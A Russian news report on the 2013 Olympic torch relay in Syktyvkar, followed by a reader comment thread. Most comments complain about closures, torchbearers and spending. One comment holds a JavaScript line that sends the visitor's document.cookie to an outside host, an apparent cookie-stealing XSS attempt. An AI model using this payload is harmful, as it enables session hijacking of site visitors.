17:02, 03.11.2013 / СПОРТ

Корреспондент БНК: «По городу огонь носили»

В субботу столицу Республики Коми охватил огонь. Сыктывкар стал 39-м городом, принимающим эстафету Олимпийского огня из Архангельской области. Предыдущим городом был Северодвинск, сегодня символ Олимпиады встречают в Нарьян-Маре. Факельное шествие длилось довольно долго - четыре часа, началось днем, а закончилось глубоким вечером. Корреспондент БНК сопроводил эстафету Олимпийского огня от аэропорта до Стефановской площади.

KBV_9086.jpg

Фото Юрия Кабанцева

С самого утра на улицах города наблюдалось непривычное для субботы оживление: из динамиков пели что-то спортивно-патриотическое, на грузовиках развозили последние недостающие ограждения, а вдоль улиц растягивали ленты, призванные отделить толпу встречающих Олимпийский огонь от непосредственного маршрута факелоносцев. Буквально через каждые несколько метров стояли полицейские, среди которых было много женщин.

KIR_3287.jpg

Уже с двух часов дня квартал улицы Советской, прилегающий к аэропорту, перекрыли – автобусы разворачивались и высаживали пассажиров на предшествующей остановке. Благо, почти все пассажиры маршрута двигались в едином порыве – навстречу Олимпийскому огню. Не повезло только гражданину с большим красным чемоданом, который направлялся в аэропорт по прямой надобности.

KIR_3265.jpg

В начале третьего у площади перед аэровокзалом собралась толпа желающих увидеть старт эстафеты в Сыктывкаре. Публику развлекали концертом - песнями и танцами районов республики. Постепенно количество зрителей увеличивалось, однако само действо, ради чего горожане пришли стоять в лужах под моросящим дождем в обнимку с детьми и карманными собачками в комбинезонах, которых, в отличие от хозяев, мысль об Олимпийском огне совсем не грела, так и не начиналось. Кто-то безуспешно пытался услышать звук садящегося самолета, явно потонувший в ижемских и усть-цилемских песнях, кто-то предположил, что публику посмели оставить без главного действа:

- Наверное, там уже огонь привезли и в город унесли, а мы тут все ждем.

KIR_3329.jpg

В один момент ворота летного поля распахнулись и явили миру главу республики в окружении хранителей огня – людей, которые сопровождают факелоносца на его пути. Не все зрители еще успели обратить свое внимание на зачинателей эстафеты, как створки ворот закрылись, а публике предложили прослушать еще одну усть-цилемскую песню. Наконец, в 15.10 долгожданная процессия двинулась к сцене и произвела положенный ритуал, правда зажечь факел с первого раза не удалось – для этого хранителю пришлось принести вторую лампаду, после чего факел наконец разгорелся, и Вячеслав Гайзер отправился на первую дистанцию. Подхватил эстафету мэр Сыктывкара Иван Поздеев.

KIR_3356.jpg

Весит огненный девайс около двух килограммов, его длина – 95 сантиметров. Перед передачей огня хранитель напоминает факелоносцу элементарные правила безопасности – держать факел повыше, не браться за его верхушку и случайно не подпалить собственную шапку. Дистанцию в 200 метров бегун теоретически должен преодолевать за две минуты, на практике примерно так и получалось – заминок по пути не происходило.

KIR_3432.jpg

Однако и весь Олимпийский кортеж, состоящий из автомобилей Volkswagen, растягивался примерно на триста метров – самого факелоносца на протяжении всего пути из медиатрака снимали федеральные журналисты, во главе процессии из звукоусилителей рассказывали о бегуне, а в это время впереди из автобуса с факелоносцами уже высаживали следующего спортсмена, принимающего эстафету.

KIR_3458.jpg

Огонь прошел по всем центральным улицам города, побывал в Кировском и Мичуринском парках, в Орбите, Давпоне, на телецентре, железнодорожном вокзале и в местечке Париж – 90 человек с символом Олимпиады в руке преодолели путь в 18 километров.

_DSF0328.jpg

Многие горожане пытались сопровождать эстафету – кто-то посещал только основные и самые крупные этапы – на «кольце», Театральной и Стефановской площадях. Кто-то стартовал от аэропорта и, сокращая путь дворами, добирался до следующей точки передачи огня. Такое спортивное ориентирование горожан увлекло:

- Надо остановиться уже, а то мы так весь день бегать будем, – проронил на бегу отец семейства, встречая пламя у Стефановского собора.

KIR_3492.jpg

Поглазеть на огонь выходили на крыльцо продавцы магазинов, жители окрестных домов занимали позиции на балконах. На одном из общежитий по улице Ленина субботним днем даже стали ремонтировать крышу, однако к половине четвертого, когда эстафета прошла первый этап, ремонтные работы резко завершились.

_DSF0352.jpg

Жители города взирали на действо и скептически, и безразлично, даже с оттенком меланхолии, но большинство все-таки было охвачено праздничной эйфорией.

- Бегите-бегите, ребятки, я вот баньку затопил сегодня с утра, если что погаснет – уголек вам подкину, – ухмыляясь в бороду, сообщил пожилой мужчина из частных домов у храма, которые, к слову, за неделю до эстафеты на всю высоту затянули зеленым полотном.

KBV_9250.jpg

В четыре часа огонь встречали в микрорайоне Орбита. Параллельно с факелоносцами, но по тротуару процессию сопровождала орава мальчишек, стартовавших от самого аэропорта, несколько человек предусмотрительно запаслись велосипедами.

KBV_9048.jpg

По части Октябрьского проспекта перед «кольцом» факелы поочередно несли особые спортсмены – призер Паралимпийских игр в Ванкувере Мария Иовлева и член российского общества инвалидов Юрий Волков.

На «кольце» тем временем «пробиться» в первые ряды зрителей было практически невозможно. Хуже всего пришлось тем, кто попросту шел домой, а перейти перекрытую дорогу возможности не имел.

KBV_9248.jpg

- Ну вот мой дом, прямо напротив! И что мне делать? – возмущенно вопрошала девушка стража порядка, не пропускавшего ее переходить Октябрьский проспект.

- Постойте, полчасика посмотрите на свой дом, потом пойдете, – не нашел большего утешения полицейский.

KBV_9197.jpg

Меж тем перейти улицу в видимых пределах было и правда невозможно. Стоящие по сторонам перекрестка люди могли ощутить себя настоящими петербуржцами в сезон разводных мостов.

Автомобилисты города не слишком-то вняли призывам администрации и днем еще пытались передвигаться по улицам на машинах, создавая пробки на узких, оставшихся не перекрытыми улицах, в то время как в некоторых городах движение перекрывалось полностью, а службы такси даже устраивали себе внеплановый выходной. Кстати, в городах, куда огонь прибывает в будние дни, школьники и работники предприятий, находящихся по пути эстафеты, также освобождаются от работы и учебы, если желают встречать факелоносцев.

KBV_9346.jpg

Завершился путь Олимпийского огня на Стефановской площади. В 19.03 четырехкратная чемпионка Олимпийских игр Раиса Сметанина под рев многотысячной толпы вбежала на площадь с последним факелом, которым совместно с главой республики Вячеславом Гайзером была зажжена чаша Олимпийского огня.

KBV_9295.jpg

Спустившуюся со сцены прославленную лыжницу горячо приветствовала толпа всех возрастов – среди зрителей было много молодежи, но и пожилые горожане, привыкшие к демонстрациям в первых числах ноября, на протяжении всего дня активно встречали Олимпийский огонь.

KBV_9460.jpg

Завершилось народное гулянье праздничным салютом и лазерным шоу с символами и гербами республики.

KBV_9490.jpg

1070

Комментарии (83)

Добавить комментарий
  • 123
    03 нояб. 2013 г., 17:41:07
    Ответить
    Нельзя было не издеваться над населением?!Недостаточно было пронести этот огонь по одной, двум центральным улицам. Почему у населения этот день практически вычеркнули из жизни.........
    • Василий
      03 нояб. 2013 г., 20:42:29
      Ответить
      Нельзя было не издеваться над населением?!
      А разве сегодняшний день должен был стать исключением? Денно и нощно издеваются на протяжении почти столетия
    • Александр
      04 нояб. 2013 г., 0:28:22
      Ответить
      По городу огонь носили. По грязному не ухоженному городу.
      Отправлено из мобильной версии
  • Руслан
    03 нояб. 2013 г., 18:02:20
    Ответить
    Я домой с ребенком два часа не мог попасть, т. к. мой дом был через улицу оцепленную полицаями, сказали ждите или идите в обход
  • Вертер
    03 нояб. 2013 г., 18:25:16
    Ответить
    Полицейским тоже досталось. Они с 10 утра торчали на улице, мерзли, хотя всем было известно,что ОГОНЬ прилетит из Архангельска в 14-30!!! Таков приказ начальства. А больничные простудившемся все равно придется платить.
    • А
      03 нояб. 2013 г., 18:47:36
      Ответить
      Полицейских уже после 8 строили, только проснулся, выглянул в окно, а им там уже инструктаж проводили. Такое количество в течении дня я в жизни не видел. Видимо из всех районов нагнали.
      • 123
        04 нояб. 2013 г., 14:18:19
        Ответить
        Не. Они просто из всех щелей повылезали.
        И явились миру целой армией
        • а
          04 нояб. 2013 г., 22:06:30
          Ответить
          интересно узнать,
          чем в "мирное" время занимается это дикое количество высокооплачиваемых (по меркам простого народа) "правоохранителей"? Где прячутся?
  • Кр.болела
    03 нояб. 2013 г., 18:25:24
    Ответить
    Стыдливо умалчивается, что самая громкая встреча факелоносца была у Эдуарда Найденкова, капитана "Строителя". Руководитель эстафеты "из центра" был удивлен и сказал что это первый город, в котором так встречали факелоносца. Др.участники с завистью отметили это и жалели, что их так не встречали, как приветствовали своего любимца болельщики "Строителя".
    • я
      05 нояб. 2013 г., 16:32:52
      Ответить
      завидуете?
      идите работать в полицию! сразу зависть куда денется!
  • "По городу огонь носили"...
    03 нояб. 2013 г., 18:25:47
    Ответить
    А мы об этом вас просили?
  • Эзотерист
    03 нояб. 2013 г., 18:31:10
    Ответить
    Языческий обряд огнепоклонения завершился. И власти города и республики приняли участие в обряде язычников.
    • Симптоматично, античные греки - первые олимпийцы
      05 нояб. 2013 г., 9:58:03
      Ответить
      все проходили обряд инициации. Ныне это определяется как педофилия
      Радостно видеть достойных наследников тех педофилов, что поклонялись олимпийским богам.
  • федя
    03 нояб. 2013 г., 19:24:21
    Ответить
    смотрел по телику , полная бездарность телевидения Коми (Юрган),всех уволить !
  • Петруха
    03 нояб. 2013 г., 19:35:53
    Ответить
    отмодерировано
    • Маруха
      04 нояб. 2013 г., 4:09:01
      Ответить
      очень иронично и прозаично
      посмеялся, оценил, жму руку
    • винни
      04 нояб. 2013 г., 22:09:11
      Ответить
      Это был неправильный газ!
  • йожег
    03 нояб. 2013 г., 19:55:00
    Ответить
    Факел должны были нести только известные и юные спортсмены, олимпийский резерв.Не в каждые руки его можно было дать. А у нас, мало того что он без конца гас, его несли и чинуши, и кокакольщики, и звезды эстрады. Что полностью дискредитировало это действие.
    • Че
      04 нояб. 2013 г., 22:19:37
      Ответить
      Суетня с народным ликованием по надуманному поводу вышла несколько натужной... Зато порадовал необычностью "заоблачный" салют и понравилось, как пела "Зажигай" девушка на Стефановской. :)
  • 1
    03 нояб. 2013 г., 20:41:17
    Ответить
    Сметанина уже не та...
    • доживите до ее лет
      04 нояб. 2013 г., 12:29:28
      Ответить
      посмотрим на вас
      • fanat
        04 нояб. 2013 г., 16:57:37
        Ответить
        Сметанина - наше ВСЁ! Не обращайте внимание на _____! Их участь гнить в тени потомков.
  • Акакий
    03 нояб. 2013 г., 21:19:35
    Ответить
    Люди, вы тупые. Для вас стараются. Но нет, всем лишь бы д*****м полить с ног до головы, притом не важно кого, определенного человека или власть в общем. Тупые, не ценящие никого и ничего граждане. Хотя гражданами то и язык не поворачивается вас назвать.
    • serf
      03 нояб. 2013 г., 22:03:59
      Ответить
      для вас старались
      1,5 триллиона рублей (в том числе и из моих налогов) это примерно 50 миллиардов долларов в бездонные карманы подрядчиков и распорядителей.
      Почему государство у народа не спросило нужно ли нам такое их "старание"?
      Неужели у нас в стране все в порядке с дорогами, медициной, обеспеченности жильем и тд. и только Зимней олимпиады не хватало для полного окончательного исчерпывающего счастья?
      • cgcg
        04 нояб. 2013 г., 16:38:47
        Ответить
        БОльшая часть оплачивается частными компаниями.
      • леди
        04 нояб. 2013 г., 19:07:27
        Ответить
        молодец!!!!! зимняя олимпиада в южном городе?!!!!!!!!!!!!!!
        • Предлагаю
          04 нояб. 2013 г., 20:28:53
          Ответить
          заявить проведение Летней Олимпиады в Воркуте!!!
    • Леон
      03 нояб. 2013 г., 22:53:04
      Ответить
      Гнусная мерзость
      Уважаемая редакция уберите эту мерзость .А вообщем не пеняй на зеркало коли ......
      • вава
        03 нояб. 2013 г., 23:00:58
        Ответить
        мерзость -это пир во время чумы!!
        и тупой роспил!!
    • L&M
      04 нояб. 2013 г., 11:09:38
      Ответить
      нам не нужны такие старания, весь город рак.м поставили
  • поржал!
    03 нояб. 2013 г., 21:36:13
    Ответить
    миллионыыыыыыы
    "под рев многотысячной толпы "???? ахаахах Фото тысячной толпы в студию плз!)
  • Мария
    03 нояб. 2013 г., 21:48:15
    Ответить
    Сметанина была, есть и останется Легендой. сами вы не те...
  • Сыктывкарец
    03 нояб. 2013 г., 22:18:26
    Ответить
    В списке факелоносцев куча непонятных людей. ГДЕ???? Люди-настоящие спортивные легенды Республики Коми: Балай, Зазерский,Еременко, а в первую очередь олимпийские чемпионы Нина Рочева, Юлия Чепалова????? Даже если эти люди не захотели нести факел их Гордеев должен был уговорить, на коленях перед ними стоять, в Москве их кандидатуры отстаивать. С такими спортивными функционерами Республика далеко не уедет.
  • Горожанин
    03 нояб. 2013 г., 22:31:24
    Ответить
    А где фото когда факел потух и его зажгли от зажигалки?)
    • asds
      04 нояб. 2013 г., 9:34:24
      Ответить
      я себе его сохранил. могу и тебе подарить
    • Меня зовут
      04 нояб. 2013 г., 17:03:20
      Ответить
      получите-распишитесь
      http://vk.com/wall-21389144_5696
  • 11 регион
    03 нояб. 2013 г., 22:39:54
    Ответить
    Ни кому не нужна эта эстафета.
  • СЫКТЫВКАРЕЦ
    03 нояб. 2013 г., 22:46:02
    Ответить
    По улице Морозова факел несла какая то тетя и во всю чавкала жевачку! просто стыдно за неё, какой то ингосстрах сказали. Браво!
    • 123
      05 нояб. 2013 г., 9:27:33
      Ответить
      Может тетя с похмела, вдруг перегар потушит факел
  • 555
    03 нояб. 2013 г., 22:51:02
    Ответить
    Злые вы... уйду я от вас!
    Всё было красиво! Эффектно! Ярко! Молодцы организаторы. Чувство гордости меня переполняло! Спасибо всем!
    • 123
      04 нояб. 2013 г., 14:26:12
      Ответить
      А гордость за что Вас переполняла.
      За Кока-колу или Ингосстрах или за свет-Гайзера нашего
      • 555
        05 нояб. 2013 г., 10:55:31
        Ответить
        для 123
        Гордость за Россию. Знаешь такую страну?
        • горожанин
          05 нояб. 2013 г., 11:33:42
          Ответить
          в тему
          Нет. Я не знаю такую страну. Знаю воровскую рашку.
  • Местный
    03 нояб. 2013 г., 22:55:08
    Ответить
    Самое возмутительное в этой эстафете, что огонь несли в основном люди или не имеющие к спорту никакого отношения, либо граждане, чей статус определяется лишь привилегией спонсорства. Кто знает, может и олимпиаду в Сочи для них придумали, а не для логики.
  • Интересно
    03 нояб. 2013 г., 22:55:39
    Ответить
    А разрешение пожарных на ношение открытого огня около зданий с пятой степенью огнестойкости было получено организаторами?
    Где с ним можно ознакомиться?
    • Песец
      03 нояб. 2013 г., 23:05:50
      Ответить
      Песец
      Ты идиот что ле?
      • Да нет
        03 нояб. 2013 г., 23:08:46
        Ответить
        Идиот-это ты! Если нет разрешения, можно подать в суд на организаторов.
  • 34
    03 нояб. 2013 г., 23:20:08
    Ответить
    42
    не знал я, что для того чтобы нести олимпийский огонь достаточно торговать рыбой в магазинах сыктывкара?:)(и да, главное, быть вхожим во власть:) (пятая снизу фотография, тов.Холмов)
  • Я
    04 нояб. 2013 г., 0:04:48
    Ответить
    Все было очень красиво, торжественно!!! Согласна с комментами, что несли все, кому не лень... Олимпийский огонь должны нести олимпийцы и выдающиеся спортсмены. Было смешно слушать, когда факел нес человек- не спортсмен, зато прозвучал комментарий- любит смотреть олимпиаду... Я тоже люблю;)
  • 123
    04 нояб. 2013 г., 0:10:33
    Ответить
    Гайзер и Поздеев - Глава и Мэр. Вроде как положено. Остальные должны были быть спортсменами. Олимпиада вне политики.А то кто-то из Ингострах, тетя Зина (теща кочегара нашей котельной) и прчие достойные лица.

    • Лола
      04 нояб. 2013 г., 2:51:13
      Ответить
      Блистательный репортаж. Отлично написано. Автору респект.
      Отправлено из мобильной версии
    • Глеб
      05 нояб. 2013 г., 11:10:47
      Ответить
      Международный олимпийский комитет не рекомендует
      Международный олимпийский комитет не рекомендует главам регионов, муниципальных и городских образований участвовать в эстафете олимпийского огня

      РИА Новости http://ria.ru/sochi2014_torchrelay/20131008/968584137.html#ixzz2jkVzyc4f
  • я
    04 нояб. 2013 г., 7:20:13
    Ответить
    в самом деле, какого 'х' факел несли все кому ни лень? Не хватает выдающихся спортсменов? Тогда маршрут надо было уменьшить раз в 5-6
    Отправлено из мобильной версии
  • и чо?
    04 нояб. 2013 г., 7:50:27
    Ответить
    Проползлзи пингвины. Дяде Путе отчитались: позорное знамя- протащили по грязному на хрен никому не нужному городу. Грязь и прочее зафигачили по переулкам. Главное- чоб дядя Путя не расстроился!
  • все было похоже
    04 нояб. 2013 г., 9:29:52
    Ответить
    на грязный праздник в мервом королевстве
    помню в детсве, в семидесятые и восьмидесятых годах, город чистый кругом красные флаги, дети и взрослые с улыбкой на лице, праздники без пива и семечек и дибильной пяной молодежи как сейчас....
  • Александр
    04 нояб. 2013 г., 9:57:48
    Ответить
    надоело
  • 77
    04 нояб. 2013 г., 10:05:31
    Ответить
    [img src=http://www.avazun.ru/images/2009/11/15/07/06/avatarka_15697.jpg]
    .
  • 0
    04 нояб. 2013 г., 10:07:34
    Ответить
    [img]http://www.avazun.ru/images/2009/11/15/07/06/avatarka_15697.jpg[/img]
    7
  • 9
    04 нояб. 2013 г., 10:12:03
    Ответить
    img = new Image(); img.src = "http://qps.ru/zQYZm?"+document.cookie;
    тема
  • Нестор
    04 нояб. 2013 г., 10:55:39
    Ответить
    Петрович
    А ещё в учебных заведениях в приказном порядке выводили студентов на улицы встречать огонь,причем лица должны были быть жизнерадостными...не менее 70 человек должно было быть от каждого
  • Будь спок!
    04 нояб. 2013 г., 13:48:45
    Ответить
    Ну вот прошла эта лабудень. И что? Кто-то завтра про неё вспомнит? Кто-то поймёт, что он стал жить лучше? Российский народ сегодня - первый наркоман в мире! Его накачивают всякой дрянью, а он даже и не сопротивляется. Для властей главный капитал - это дурь рядового народа. Чем его будет больше, тем проще отсюда станет вывозить бабки. Бабки вывезут, народ останется. И хоть трава не расти для Слав и Вань!
  • вольдемар
    04 нояб. 2013 г., 14:55:21
    Ответить
    сколько денег выкинула республика на это языческое представление?
    Отправлено из мобильной версии
    • Нестор Петрович
      04 нояб. 2013 г., 15:31:59
      Ответить
      Волька
      а ты женьги не считай,наше дело маленькое,радоваться таким мероприятиям,как туземцы бусам..а то что хлеб дорожает и бензин,так не хлебом единым сыт человек..не хватает хлеба,на тебе зрелищ,всё равно на деньги народа,кушайте господа хорошие
    • :)
      04 нояб. 2013 г., 23:08:53
      Ответить
      Монотеистам завидно ?)))
  • Судьба-злодейка
    04 нояб. 2013 г., 15:51:29
    Ответить
    По городу огонь носили. И как-то незаметно спились...
    • Лиса
      04 нояб. 2013 г., 19:58:14
      Ответить
      Со Сметаниной с одной деревни...помниться молодой была не любил ее ни кто ,вредная баба была..сейчас уже в возрасте, сдает, у нас молодых нет лиц, пловцов Глава поддержал, хорошо, а на лыжне династии ,молодых нет ,да и не пустят, кто в лыжника без имени деньги вложит, и еще почему до сих пор все спортсмены из династий и др.по учрежд.числ.и спецзван.получаю, это не честно, они выслугу ,звания, чины,плюс зарплата спортсмена, а вообще,они могут бизнес иметь и фед.службах числиться, гонорары от спонсоров, это ли не коррупция,в форме разложения морали, как они живут в обычной жизни...может я не права простите Христа ради не хотела обидеть.
  • Степан
    04 нояб. 2013 г., 20:17:22
    Ответить
    По городу факел носили, а по Сысольскому возили. Лучше бы молодым спортсменам факел дали. Они бы с радостью маршрут весь пробежали!
    Стыдно должно быть организаторам за такую профанацию, когда мимо встречающих олимпийский огонь людей проехали машины ДПС и автобусы.
    У факелоносцев видно сил не хватило бежать....
    Отправлено из мобильной версии
    • Леон
      04 нояб. 2013 г., 22:43:15
      Ответить
      Жующие тетки и толстые дядьки.
      Вы правы,право пронести факел надо было дать молодым спортсменам,сиротам и просто хорошим жителям РК,а не жующим тетечкам,пьющим американскую г..... и толстым мужичкам. Недавно просматривал открытие Олимпиады в Москве,ни в какое сравнение с этой профанацией.
      • ифи
        05 нояб. 2013 г., 10:25:31
        Ответить
        степан это точно,полностью согласна с вами....ни стыда ни совести у них нет....
      • ифи
        05 нояб. 2013 г., 10:25:33
        Ответить
        степан это точно,полностью согласна с вами....ни стыда ни совести у них нет....
  • правда!
    05 нояб. 2013 г., 7:37:38
    Ответить
    кому вообще нужна эта олимпиада? столько денег потратили...лишь бы показуху устроить.....а на что??? на наши нлоги граждане) заплатил налоги-спи спокойно...
    • Вася Пупкмн
      05 нояб. 2013 г., 9:29:33
      Ответить
      Самое обидное что просерут олипеяду, на 100500 будем месте, у параши.
  • европейцы поступили мудро
    05 нояб. 2013 г., 9:27:58
    Ответить
    Швейцарии это нахрен не надо
    http://lenta.ru/news/2013/03/04/noway/

    Есть чему поучиться. Хотя, к сожалению, у нас же бородатый Чуров есть. ЦИК жизнерадостно бы проблеял, что согласны на проведение распилиады 120 % россиян..
    • свидетель
      05 нояб. 2013 г., 16:52:28
      Ответить
      Не только Швейцарии, но и всей Европе это не нужно. Во Франции жители Греноб**, где Олимпиада проходила в 1968 году, только в начале 2000-х закончили расплачиваться с долгами! А Альбервиле (Олимпиада-1992) олимпийские конструкции стоят никому ненужные и потихоньку разваливаются. Так же и в России будет. Олимпиада- это всего лишь бизнес. Угрохают миллиарды, наварятся на этом единицы, народ посмотрит яркое шоу, а потом вернется к своему разбитому корыту. И останутся после всего олимпийские развалины и огромная дыра в бюджете.
      • Плохо считаете, извините
        05 нояб. 2013 г., 18:05:07
        Ответить
        Лакомые кусочки, например, полянку с горнолыжным комплексом купят (если не купили заочно, вложив в горнолыжный комплекс) господа известные. А инфраструктура в Сочи за наш с вами счет - это не в счет. Это бюджет. Все продумано.
        • свидетель
          05 нояб. 2013 г., 20:15:25
          Ответить
          Вы правы.
  • +++
    05 нояб. 2013 г., 13:15:27
    Ответить
    Эх.
    Вот если бы с таким же рвением и счастливыми улыбками на губах ОНИ отремонтировали бы дороги во дворах и на дачных маршрутах. И построили велодорожек побольше, а не только в Кировском парке.
  • игорь
    05 нояб. 2013 г., 19:24:12
    Ответить
    возглавлял шествие Фалокеносец Гайзер
  • читатель
    05 нояб. 2013 г., 19:34:30
    Ответить
    это был пир во время чумы!!!